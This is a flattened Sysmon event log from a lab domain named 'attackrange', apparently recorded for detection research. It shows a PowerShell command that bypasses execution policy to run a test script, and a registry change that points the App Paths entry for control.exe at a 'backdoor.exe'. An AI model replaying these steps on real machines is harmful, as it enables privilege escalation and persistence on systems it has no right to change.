08:02:37.733{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.733{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.718{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.718{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}635610236C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.686{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001052695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.649{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001052694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.649{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=7DF9D06FA3FF100C721D8101DF107116,SHA256=3B641FA376C4B9B9DD98A53E830FD4E11195277FBE6DE1AD5D8F765675C958B5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.618{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 23542300x80000000000000001052692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.603{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=2BBF0EF7F12C0E0D4CE01903A24DF320,SHA256=DB1923770FFF300815D58749BD354D98CC829CF19652746891F8244AE1DC4739,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.603{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.603{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.587{466BC892-F71D-60EB-BA7D-00000000CF01}94728012C:\Windows\system32\conhost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.565{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F71D-60EB-BA7D-00000000CF01}9472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.550{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001052681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.532{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.402{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CFED4E0CC8AB51FBACE02C4663B02C9,SHA256=94354E8F361453DF0B4B5950BF1F9AE6102CF78F04B241711A0EF2AC76D26CAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:37.267{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=168E9786B939FDE49D523E4CFB425D4D,SHA256=68BA6813F9E07682F524A82E7CE78FC3833879472FA6DC22D2E37A93978EE877,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:37.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57397-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:38.267{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDE7F7D9BE8AE740AD664E46BF5780E6,SHA256=4E5D89BDCEF50281B2C95B8512DFAD46C5A2D22B56D9974C9C794F42807694F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=583C41CF5F4F90FE22C9B204770DFD25,SHA256=D2DF0D165DC3EB5BB078354166F31345715F0220B793FDE3DA69E2DABA6052E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.651{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C48E25A973AF1552D54B61AAC9B0966,SHA256=CAE9C9ACB928036FECF5A32DDD6B956D553CBC77CAC321D32718F365A6AF597D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.651{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF0F113DFC8A2EA333088ED4F4A62E6,SHA256=3912CD6C6D527E8DFC45AEE1B4CF8A637AA7F67A2359FA5788E65707CF26F469,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.651{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5563E9C70ADE9B62823D0F52A1F504E2,SHA256=5A4EBE58B56972E35F396039CF0960F370A2791B99DC5E35ABD8BF161DBD02A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.620{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=28A25DA07F24D31F0A77F57894BB1570,SHA256=648275C9696CE496766197A01CAE5B38E6E3B7F537D2271DFD9D000046DB7272,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:02:38.420{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\test\backdoor.exe 12241200x80000000000000001052727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:02:38.303{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 10341000x80000000000000001052726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:38.134{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 